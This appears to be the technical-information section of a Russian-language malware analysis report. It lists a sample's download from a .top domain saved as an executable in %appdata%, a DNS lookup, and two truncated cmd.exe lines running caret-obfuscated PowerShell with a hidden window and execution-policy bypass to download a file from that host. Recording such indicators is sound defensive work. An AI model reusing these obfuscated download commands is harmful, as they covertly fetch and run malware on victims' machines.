Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^Ower^s^h^elL^.^e^Xe^ ^-E^xec^uT^ioN^policy ^bypA^sS -N^opro^FiLe -w^In^d^OWstYle hid^deN^ (^n^Ew^-Obje^Ct syste^M^.NEt^.^Web^clIEnt)^.d^o^wnloA^df^ILe('http://hometowergop...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "p^Ower^s^h^elL^.^e^Xe^ ^-E^xec^uT^ioN^policy ^bypA^sS -N^opro^FiLe -w^In^d^OWstYle hid^deN^ (^n^Ew^-Obje^Ct syste^M^.NEt^.^Web^clIEnt)^.d^o^wnloA^df^ILe('http://hometowergop...' (со скрытым окном)